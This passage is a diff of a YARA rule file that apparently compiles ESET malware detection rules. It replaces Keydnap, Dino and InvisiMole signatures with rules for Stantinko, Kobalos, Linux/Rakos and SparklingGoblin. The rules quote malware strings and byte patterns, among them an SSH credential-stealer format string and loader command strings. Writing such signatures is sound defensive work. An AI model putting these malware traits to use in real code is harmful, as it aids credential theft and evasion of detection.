+		all of them
 }
-rule ESET_Keydnap_Backdoor_Packer
+rule ESET_Stantinko_Droppers : FILE
 {
 	meta:
-		description = "OSX/Keydnap packed backdoor"
-		author = "Marc-Etienne M.Léveillé"
-		id = "f29ad5af-bc86-5764-9451-5a8363788c4e"
-		date = "2016-07-06"
-		modified = "2016-07-06"
-		reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/keydnap/keydnap.yar#L51-L67"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "fe2e6987-929a-59e3-a9ec-01a9f55fe589"
+		date = "2017-07-17"
+		modified = "2017-07-20"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L150-L170"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "b1740bf38376be81d3b42306c2ce81f578c0b5c9db804f063836bf98f57ed147"
+		logic_hash = "c56fc85834a3e1bb1c14da37fb509c7de3009bf81d52800fe0093dc489f6deaa"
 		score = 75
 		quality = 80
-		tags = ""
-		version = "1"
+		tags = "FILE"
+		Author = "Marc-Etienne M.Léveillé"
+		Description = "Stantinko droppers"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	strings:
-		$upx_string = "This file is packed with the UPX"
-		$packer_magic = "ASS7"
-		$upx_magic = "UPX!"
+		$s1 = {55 8B EC 83 EC 08 53 56 BE 80 F4 45 00 57 81 EE 80 0E 41 00 56 E8 6D 23 00 00 56 8B D8 68 80 0E 41 00 53 89 5D F8 E8 65 73 00 00 8B 0D FC F5 45}
+		$s2 = {7E 5E 7F 8C 08 46 00 00 AB 57 1A BB 91 5C 00 00 FA CC FD 76 90 3A 00 00}
 
 	condition:
-		$upx_string and $packer_magic and not $upx_magic
+		uint16( 0 ) == 0x5A4D and 1 of them
 }
-rule ESET_Keydnap_Backdoor
+
+rule ESET_Stantinko_D3D
 {
 	meta:
-		description = "Unpacked OSX/Keydnap backdoor"
-		author = "Marc-Etienne M.Léveillé"
-		id = "099c1796-6237-5ec1-ba25-cd5feca79865"
-		date = "2016-07-06"
-		modified = "2016-07-06"
-		reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/keydnap/keydnap.yar#L69-L86"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "6652e55c-96a0-55a7-9941-7f32bbf984e5"
+		date = "2017-07-17"
+		modified = "2017-07-20"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L172-L187"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "fa209577a562ef9088d3ad3df3fbc0edda96f09d19177842f0ddea42c658f530"
+		logic_hash = "4e8da3f11df15e4aa469db62961ae390c4c4df2a5335eec0bdab19b14cc8343d"
 		score = 75
 		quality = 80
 		tags = ""
-		version = "1"
+		Author = "Marc-Etienne M.Léveillé"
+		Description = "Stantinko d3dadapter component"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
+
+	condition:
+		pe.exports( "EntryPoint" ) and pe.exports ( "ServiceMain" ) and pe.imports ( "WININET.DLL" , "HttpAddRequestHeadersA" )
+}
+rule ESET_Stantinko_Ihctrl32
+{
+	meta:
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "e8ab9f78-f438-5d9b-8407-e6c7e241da2c"
+		date = "2017-07-17"
+		modified = "2017-07-20"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L189-L209"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "1829e08fb2289f738d0e75ad9977169e9a94379da764b1766f23fa47e8bc2543"
+		score = 75
+		quality = 80
+		tags = ""
+		Author = "Marc-Etienne M.Léveillé"
+		Description = "Stantinko ihctrl32 component"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	strings:
-		$ = "api/osx/get_task"
-		$ = "api/osx/cmd_executed"
-		$ = "Loader-"
-		$ = "u2RLhh+!LGd9p8!ZtuKcN"
-		$ = "com.apple.iCloud.sync.daemon"
+		$s1 = "ihctrl32.dll"
+		$s2 = "win32_hlp"
+		$s3 = "Ihctrl32Main"
+		$s4 = "I%citi%c%size%s%c%ci%s"
+		$s5 = "Global\\Intel_hctrl32"
 
 	condition:
 		2 of them
 }
-rule ESET_Dino
+rule ESET_Stantinko_Wsaudio
 {
 	meta:
 		description = "No description has been set in the source file - ESET"
 		author = "ESET TI"
-		id = "77d0a039-f60c-59ea-bad6-5b4b630007bb"
-		date = "2015-07-14"
-		modified = "2015-08-17"
+		id = "623f4ac7-03ec-52df-b7bf-0a2055453c52"
+		date = "2017-07-17"
+		modified = "2017-07-20"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/animalfarm/animalfarm.yar#L73-L96"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L211-L233"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "898e527eb8b05050135dee7cbe974100710a1a3a6a5cb8eb03563ee1c0aca01f"
+		logic_hash = "45d92f1475f316ba50a9a4a3dd519d1186ed16c68bd2debe326736a1e3154562"
 		score = 75
 		quality = 80
 		tags = ""
-		Author = "Joan Calvet"
-		Description = "Dino backdoor"
+		Author = "Marc-Etienne M.Léveillé"
+		Description = "Stantinko wsaudio component"
 		Contact = "github@eset.com"
 		License = "BSD 2-Clause"
 
 	strings:
-		$ = "PsmIsANiceM0du1eWith0SugarInsideA"
-		$ = "destroyPSM"
-		$ = "FM_PENDING_DOWN_%X"
-		$ = "%s was canceled after %d try (reached MaxTry parameter)"
-		$ = "you forgot value name"
-		$ = "wakeup successfully scheduled in %d minutes"
-		$ = "BD started at %s"
-		$ = "decyphering failed on bd"
+		$s1 = "GetInterface"
+		$s2 = "wsaudio.dll"
+		$s3 = "Global\\Wsaudio_Initialize"
+		$s4 = "SOFTWARE\\Classes\\%s.FieldListCtrl.1\\"
 
 	condition:
-		any of them
+		2 of them
 }
-rule ESET_Apt_Windows_Invisimole_Logs : FILE
+rule ESET_Stantinko_Ghstore
 {
 	meta:
-		description = "Detects log files with collected created by InvisiMole's RC2CL backdoor"
-		author = "ESET Research"
-		id = "151883ad-1f44-55b4-b12a-f0d399527189"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "ef9f0c27-35ea-5dd5-925f-09b6e043569d"
+		date = "2017-07-17"
+		modified = "2017-07-20"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L54-L77"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/stantinko/stantinko.yar#L235-L255"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "d42423ccc768f1823c76d5cb2aec26434c796fc35bd4e2fbf435fcf7997d3ff0"
+		logic_hash = "e5628d6ffb2d3684264b3a88c4d7b5d2ce8983aa22badf5839ccb8ba2e3ef2d4"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = "1"
+		tags = ""
+		Author = "Marc-Etienne M.Léveillé"
+		Description = "Stantinko ghstore component"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
+
+	strings:
+		$s1 = "G%cost%sSt%c%s%s%ce%sr" wide
+		$s2 = "%cho%ct%sS%sa%c%s%crve%c" wide
+		$s3 = "Par%c%ce%c%c%s" wide
+		$s4 = "S%c%curity%c%s%c%s" wide
+		$s5 = "Sys%c%s%c%c%su%c%s%clS%c%s%serv%s%ces" wide
 
 	condition:
-		uint32( 0 ) == 0x08F1CAA1 or uint32( 0 ) == 0x08F1CAA2 or uint32( 0 ) == 0x08F1CCC0 or uint32( 0 ) == 0x08F2AFC0 or uint32( 0 ) == 0x083AE4DF or uint32( 0 ) == 0x18F2CBB1 or uint32( 0 ) == 0x1900ABBA or uint32( 0 ) == 0x24F2CEA1 or uint32( 0 ) == 0xDA012193 or uint32( 0 ) == 0xDA018993 or uint32( 0 ) == 0xDA018995 or uint32( 0 ) == 0xDD018991
+		3 of them
 }
-rule ESET_Apt_Windows_Invisimole_SFX_Dropper : FILE
+rule ESET_Kobalos
 {
 	meta:
-		description = "Detects trojanized InvisiMole files: patched RAR SFX droppers with added InvisiMole blobs (config encrypted XOR 2A at the end of a file)"
-		author = "ESET Research"
-		id = "08490bcd-3139-5fac-9c6c-5a32acb7217a"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		description = "Kobalos malware"
+		author = "Marc-Etienne M.Léveillé"
+		id = "cdffbe3d-c19d-53a8-9051-48affae00c8a"
+		date = "2020-11-02"
+		modified = "2021-02-01"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L79-L95"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/kobalos/kobalos.yar#L32-L56"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "6ca248d42c1e889988e5931d80df071cb20e623fb0c4a208044cabe073f71ce4"
+		logic_hash = "9161d22f9fbb1700dc3121e32104240e34512cb280aaf950aec61513f89061ef"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		license = "BSD 2-Clause"
 		version = "1"
 
 	strings:
-		$encrypted_config = {5F 59 4F 58 19 18 04 4E 46 46 2A 5D 59 5A 58 43 44 5E 4C 7D 2A 0F 2A 59 2A 78 2A 4B 2A 58 2A 0E 2A 6F 2A 72 2A 4B 2A 0F 2A 4E 2A 04 2A 0F 2A 4E 2A 76 2A 0F 2A 79 2A 2A 2A 79 42 4F 46 46 6F 52 4F 49 5F 5E 4F 7D 2A 79 42 4F 46 46 19 18 04 4E 46 46 2A 7C 43 58 5E 5F 4B 46 6B 46 46 45 49 2A 66 45 4B 4E 66 43 48 58 4B 58 53 6B}
+		$encrypted_strings_sizes = {
+            05 00 00 00 09 00 00 00  04 00 00 00 06 00 00 00
+            08 00 00 00 08 00 00 00  02 00 00 00 02 00 00 00
+            01 00 00 00 01 00 00 00  05 00 00 00 07 00 00 00
+            05 00 00 00 05 00 00 00  05 00 00 00 0A 00 00 00
+        }
+		$password_md5_digest = { 3ADD48192654BD558A4A4CED9C255C4C }
+		$rsa_512_mod_header = { 10 11 02 00 09 02 00 }
+		$strings_rc4_key = { AE0E05090F3AC2B50B1BC6E91D2FE3CE }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypted_config
+		any of them
 }
-rule ESET_Apt_Windows_Invisimole_CPL_Loader : FILE
+rule ESET_Kobalos_Ssh_Credential_Stealer
 {
 	meta:
-		description = "CPL loader"
-		author = "ESET Research"
-		id = "feff8627-6085-5835-ac1b-d4522245f7db"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		description = "Kobalos SSH credential stealer seen in OpenSSH client"
+		author = "Marc-Etienne M.Léveillé"
+		id = "b1fc5163-de48-57fc-8ae7-1f2be6c64d8a"
+		date = "2020-11-02"
+		modified = "2021-02-01"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L97-L118"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/kobalos/kobalos.yar#L58-L73"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "cd5c19e14faa7fd3758b30193ccf2bed3692ad29d8216466523ca25d2abcfe88"
+		logic_hash = "be238f5c2cc976a5638584a8c0fc580f2076735aadfe374e8d4162ba723bce10"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		license = "BSD 2-Clause"
 		version = "1"
 
 	strings:
-		$s1 = "WScr%steObject(\"WScr%s.Run(\"::{20d04fe0-3a%s30309d}\\\\::{21EC%sDD-08002B3030%s\", 0);"
-		$s2 = "\\Control.js" wide
-		$s3 = "\\Control Panel.lnk" wide
-		$s4 = "FPC 3.0.4 [2019/04/13] for x86_64 - Win64"
-		$s5 = "FPC 3.0.4 [2019/04/13] for i386 - Win32"
-		$s6 = "imageapplet.dat" wide
-		$s7 = "wkssvmtx"
+		$ = "user: %.128s host: %.128s port %05d user: %.128s password: %.128s"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 3 of them )
+		any of them
 }
-
-rule ESET_Apt_Windows_Invisimole_Wrapper_DLL
+rule ESET_Prikormka
 {
 	meta:
-		description = "Detects InvisiMole wrapper DLL with embedded RC2CL and RC2FM backdoors, by export and resource names"
-		author = "ESET Research"
-		id = "b9609b09-3ef5-5793-a3aa-4692cec367d9"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "6073aa34-d385-5ae8-b97d-9b3d61015aae"
+		date = "2016-05-10"
+		modified = "2019-08-28"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L120-L138"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/groundbait/prikormka.yar#L130-L141"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "156bc5bc7b0ed5c77a5a15e7799a3077d40150896476a60935cf21a9afe36856"
+		logic_hash = "f64195e680fbaefedba248aa15b37ed30ba72f42958cc48963a140165e951bff"
+		score = 75
+		quality = 80
+		tags = ""
+		Author = "Anton Cherepanov"
+		Description = "Operation Groundbait"
+		Contact = "threatintel@eset.com"
+		License = "BSD 2-Clause"
+
+	condition:
+		ESET_Prikormkadropper_PRIVATE or ESET_Prikormkamodule_PRIVATE or ESET_Prikormkaearlyversion_PRIVATE
+}
+rule ESET_Linux_Rakos
+{
+	meta:
+		description = "Linux/Rakos.A executable"
+		author = "Peter Kálnai"
+		id = "3c15401a-22c1-59e2-a979-1f9a6a990ae0"
+		date = "2016-12-13"
+		modified = "2016-12-19"
+		reference = "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/rakos/rakos.yar#L33-L53"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "79a02ada56bf75c5f178b58822eb905977cace3483453ea8cf4dfc32f6b6c30d"
 		score = 75
 		quality = 80
 		tags = ""
-		license = "BSD 2-Clause"
 		version = "1"
+		contact = "threatintel@eset.com"
+		license = "BSD 2-Clause"
+
+	strings:
+		$ = "upgrade/vars.yaml"
+		$ = "MUTTER"
+		$ = "/tmp/.javaxxx"
+		$ = "uckmydi"
 
 	condition:
-		pe.exports( "GetDataLength" ) and for any y in ( 0 .. pe.number_of_resources - 1 ) : ( pe.resources [ y ] . type == pe.RESOURCE_TYPE_RCDATA and pe.resources [ y ] . name_string == "R\x00C\x002\x00C\x00L\x00" ) and for any y in ( 0 .. pe.number_of_resources - 1 ) : ( pe.resources [ y ] . type == pe.RESOURCE_TYPE_RCDATA and pe.resources [ y ] . name_string == "R\x00C\x002\x00F\x00M\x00" )
+		3 of them
 }
-rule ESET_Apt_Windows_Invisimole_DNS_Downloader : FILE
+
+rule ESET_Sparklinggoblin_Chacha20Loader_Richheader
 {
 	meta:
-		description = "InvisiMole DNS downloader"
+		description = "Rule matching ChaCha20 loaders rich header"
 		author = "ESET Research"
-		id = "1caa6c8b-3798-556e-835e-885b7f3f4511"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "e1dac369-f25e-5cb3-aafa-b0c45f05b295"
+		date = "2021-03-30"
+		modified = "2021-08-26"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L140-L170"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/sparklinggoblin/SparklingGoblin.yar#L33-L57"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "88d6ed7ec1331153d19afc18473a4be2b214ad8af29fcf7051a2a8e40e088231"
+		hash = "09ffe37a54bc4ebebd8d56098e4c76232f35d821"
+		hash = "29b147b76bb0d9e09f7297487cb972e6a2905586"
+		hash = "33f2c3de2457b758fc5824a2b253ad7c7c2e9e37"
+		hash = "45bef297ce78521eac6ee39e7603e18360e67c5a"
+		hash = "4cec7cdc78d95c70555a153963064f216dae8799"
+		hash = "4d4c1a062a0390b20732ba4d65317827f2339b80"
+		hash = "4f6949a4906b834e83ff951e135e0850fe49d5e4"
+		logic_hash = "a5c9595036dec0e0aef0a030c590189752217d15d3f53bf3dc537f5b43fae63e"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		license = "BSD 2-Clause"
-		version = "1"
-
-	strings:
-		$d = "DnsQuery_A"
-		$s1 = "Wireshark-is-running-{9CA78EEA-EA4D-4490-9240-FC01FCEF464B}" xor
-		$s2 = "AddIns\\" ascii wide xor
-		$s3 = "pcornomeex." xor
-		$s4 = "weriahsek.rxe" xor
-		$s5 = "dpmupaceex." xor
-		$s6 = "TCPViewClass" xor
-		$s7 = "PROCMON_WINDOW_CLASS" xor
-		$s8 = "Key%C"
-		$s9 = "AutoEx%C" xor
-		$s10 = "MSO~"
-		$s11 = "MDE~"
-		$s12 = "DNS PLUGIN, Step %d" xor
-		$s13 = "rundll32.exe \"%s\",StartUI"
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and $d and 5 of ( $s* )
+		pe.rich_signature.length>= 104 and pe.rich_signature.length <= 112 and pe.rich_signature.toolid ( 241 , 40116 ) >= 5 and pe.rich_signature.toolid ( 241 , 40116 ) <= 10 and pe.rich_signature.toolid ( 147 , 30729 ) == 11 and pe.rich_signature.toolid ( 264 , 24215 ) >= 15 and pe.rich_signature.toolid ( 264 , 24215 ) <= 16
 }
-rule ESET_Apt_Windows_Invisimole_RC2CL_Backdoor : FILE
+rule ESET_Sparklinggoblin_Chacha20 : FILE
 {
 	meta:
-		description = "InvisiMole RC2CL backdoor"
+		description = "SparklingGoblin ChaCha20 implementations"
 		author = "ESET Research"
-		id = "0228b8ee-bf03-504e-8cdf-8a1c9a79d54e"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "c0caceca-f685-5786-82f6-3ab7435f8061"
+		date = "2021-05-20"
+		modified = "2021-08-26"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L172-L213"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/sparklinggoblin/SparklingGoblin.yar#L59-L368"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "c38550023515d33eaaf0669cc8b874bcfd09653a07c7edbf72e3344d1cf31541"
+		hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b"
+		hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f"
+		hash = "8be6d5f040d0085c62b1459afc627707b0de89cf"
+		hash = "4668302969fe122874fb2447a80378dcb671c86b"
+		hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b"
+		hash = "9ce7650f2c08c391a35d69956e171932d116b8bd"
+		hash = "91b32e030a1f286e7d502ca17e107d4bfbd7394a"
+		logic_hash = "b742bc22e0ebbce40607cb109b4d6fb03a40c1fb223c8092d93346dd3dd22789"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		license = "BSD 2-Clause"
-		version = "1"
 
 	strings:
-		$s1 = "RC2CL" wide
-		$s2 = "hp12KsNh92Dwd" wide
-		$s3 = "ZLib package %s: files: %d, total size: %d" wide
-		$s4 = "\\Un4seen" wide
-		$s5 = {9E 01 3A AD}
-		$s6 = "~mrc_" wide
-		$s7 = "~src_" wide
-		$s8 = "~wbc_" wide
-		$s9 = "zdf_" wide
-		$s10 = "~S0PM" wide
-		$s11 = "~A0FM" wide
-		$s12 = "~70Z63\\" wide
-		$s13 = "~E070C" wide
-		$s14 = "~N031E" wide
-		$s15 = "%szdf_%s.data" wide
-		$s16 = "%spicture.crd" wide
-		$s17 = "%s70zf_%s.cab" wide
-		$s18 = "%spreview.crd" wide
-		$s19 = "Value_Bck" wide
-		$s20 = "Value_WSFX_ZC" wide
-		$s21 = "MachineAccessStateData" wide
-		$s22 = "SettingsSR2" wide
+		$chunk_1 = {
+            8B 4D ??
+            56
+            8B 75 ??
+            57
+            8B 7D ??
+            8B 04 BB
+            01 04 93
+            8B 04 B3
+            33 04 93
+            C1 C0 10
+            89 04 B3
+            01 04 8B
+            8B 04 BB
+            33 04 8B
+            C1 C0 0C
+            89 04 BB
+            01 04 93
+            8B 04 B3
+            33 04 93
+            C1 C0 08
+            89 04 B3
+            01 04 8B
+            8B 04 BB
+            33 04 8B
+            C1 C0 07
+            89 04 BB
+        }
+		$chunk_2 = {
+            03 4D ??
+            44 03 C0
+            03 55 ??
+            33 F1
+            45 33 D8
+            C1 C6 10
+            44 33 F2
+            41 C1 C3 10
+            41 03 FB
+            41 C1 C6 10
+            45 03 E6
+            41 03 DA
+            44 33 CB
+            44 03 EE
+            41 C1 C1 10
+            8B C7
+            33 45 ??
+            45 03 F9
+            C1 C0 0C
+            44 03 C0
+            45 33 D8
+            44 89 45 ??
+            41 C1 C3 08
+            41 03 FB
+            44 8B C7
+            44 33 C0
+            41 8B C5
+            33 45 ??
+            C1 C0 0C
+            03 C8
+            41 C1 C0 07
+            33 F1
+            89 4D ??
+            C1 C6 08
+            44 03 EE
+            41 8B CD
+            33 C8
+            41 8B C4
+            33 45 ??
+            C1 C0 0C
+            03 D0
+            C1 C1 07
+            44 33 F2
+            89 55 ??
+            41 C1 C6 08
+            45 03 E6
+            41 8B D4
+            33 D0
+            41 8B C7
+            41 33 C2
+            C1 C2 07
+            C1 C0 0C
+            03 D8
+            44 33 CB
+            41 C1 C1 08
+            45 03 F9
+            45 8B D7
+            44 33 D0
+            8B 45 ??
+            03 C1
+            41 C1 C2 07
+            44 33 C8
+            89 45 ??
+            41 C1 C1 10
+            45 03 E1
+            41 8B C4
+            33 C1
+            8B 4D ??
+            C1 C0 0C
+            03 C8
+            44 33 C9
+            89 4D ??
+            89 4D ??
+            41 C1 C1 08
+            45 03 E1
+            41 8B CC
+            33 C8
+            8B 45 ??
+            C1 C1 07
+            89 4D ??
+            89 4D ??
+            03 C2
+            41 03 D8
+            89 45 ??
+            41 33 C3
+            C1 C0 10
+            44 03 F8
+            41 8B CF
+            33 CA
+            8B 55 ??
+        }
+		$chunk_3 = {
+            C7 45 ?? 65 78 70 61
+            4C 8D 45 ??
+            C7 45 ?? 6E 64 20 33
+            4D 8B F9
+            C7 45 ?? 32 2D 62 79
+            4C 2B C1
+            C7 45 ?? 74 65 20 6B
+        }
+		$chunk_4 = {
+            0F B6 02
+            0F B6 4A ??
+            C1 E1 08
+            0B C8
+            0F B6 42 ??
+            C1 E1 08
+            0B C8
+            0F B6 42 ??
+            C1 E1 08
+            0B C8
+            41 89 0C 10
+            48 8D 52 ??
+            49 83 E9 01
+        }
+		$chunk_5 = {
+            03 4D ??
+            44 03 C0
+            03 55 ??
+            33 F1
+            41 33 F8
+            C1 C6 10
+            44 33 F2
+            C1 C7 10
+            44 03 DF
+            41 C1 C6 10
+            45 03 E6
+            44 03 CB
+            45 33 D1
+            44 03 EE
+            41 C1 C2 10
+            41 8B C3
+            33 45 ??
+            45 03 FA
+            C1 C0 0C
+            44 03 C0
+            41 33 F8
+            44 89 45 ??
+            C1 C7 08
+            44 03 DF
+            45 8B C3
+            44 33 C0
+            41 8B C5
+            33 45 ??
+            C1 C0 0C
+            03 C8
+            41 C1 C0 07
+            33 F1
+            89 4D ??
+            C1 C6 08
+            44 03 EE
+            41 8B CD
+            33 C8
+            41 8B C4
+            33 45 ??
+            C1 C0 0C
+            03 D0
+            C1 C1 07
+            44 33 F2
+            89 55 ??
+            41 C1 C6 08
+            45 03 E6
+            41 8B D4
+            33 D0
+            41 8B C7
+            33 C3
+            C1 C2 07
+            C1 C0 0C
+            44 03 C8
+            45 33 D1
+            41 C1 C2 08
+            45 03 FA
+            41 8B DF
+            33 D8
+            8B 45 ??
+            03 C1
+            C1 C3 07
+            44 33 D0
+            89 45 ??
+            41 C1 C2 10
+            45 03 E2
+            41 8B C4
+            33 C1
+            8B 4D ??
+            C1 C0 0C
+            03 C8
+            44 33 D1
+            89 4D ??
+            89 4D ??
+            41 C1 C2 08
+            45 03 E2
+            41 8B CC
+            33 C8
+            8B 45 ??
+            C1 C1 07
+            89 4D ??
+            89 4D ??
+            03 C2
+            45 03 C8
+            89 45 ??
+            33 C7
+            C1 C0 10
+            44 03 F8
+            41 8B CF
+            33 CA
+            8B 55 ??
+            C1 C1 0C
+            03 D1
+            8B FA
+            89 55 ??
+            33 F8
+            89 55 ??
+            8B 55 ??
+            03 D3
+            C1 C7 08
+            44 03 FF
+            41 8B C7
+            33 C1
+            C1 C0 07
+            89 45 ??
+            89 45 ??
+            8B C2
+            33 C6
+            C1 C0 10
+            44 03 D8
+            41 33 DB
+            C1 C3 0C
+            03 D3
+            8B F2
+            89 55 ??
+            33 F0
+            41 8B C1
+            41 33 C6
+            C1 C6 08
+            C1 C0 10
+            44 03 DE
+            44 03 E8
+            41 33 DB
+            41 8B CD
+            C1 C3 07
+            41 33 C8
+            44 8B 45 ??
+            C1 C1 0C
+            44 03 C9
+            45 8B F1
+            44 33 F0
+            41 C1 C6 08
+            45 03 EE
+            41 8B C5
+            33 C1
+            8B 4D ??
+            C1 C0 07
+        }
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and 5 of ( $s* )
+		any of them and filesize < 450KB
 }
-rule ESET_Apt_Windows_Invisimole : FILE
+rule ESET_Sparklinggoblin_Etweventwrite
 {
 	meta:
-		description = "InvisiMole magic values, keys and strings"
+		description = "SparklingGoblin EtwEventWrite patching"
 		author = "ESET Research"
-		id = "4d48996b-9792-57ba-a302-349220323712"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "27b36ee1-a98c-5174-a156-8e0b0d0a58cd"
+		date = "2021-05-20"
+		modified = "2021-08-26"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L215-L255"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/sparklinggoblin/SparklingGoblin.yar#L370-L463"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "7a2cff9febe77d718089ba4e1a33f3487594588892e418cec685bf22b156fa2b"
+		hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b"
+		hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f"
+		hash = "8be6d5f040d0085c62b1459afc627707b0de89cf"
+		hash = "4668302969fe122874fb2447a80378dcb671c86b"
+		hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b"
+		hash = "9ce7650f2c08c391a35d69956e171932d116b8bd"
+		logic_hash = "45615dcc5302392c18052818071623a9d1a1008c460bdb24a4acfb4300356c6b"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		license = "BSD 2-Clause"
-		version = "1"
 
 	strings:
-		$s1 = "CryptProtectData"
-		$s2 = "CryptUnprotectData"
-		$s3 = {9E 01 3A AD}
-		$s4 = "GET /getversion2a/%d%.2X%.2X/U%sN HTTP/1.1"
-		$s5 = "PULSAR_LOADER.dll"
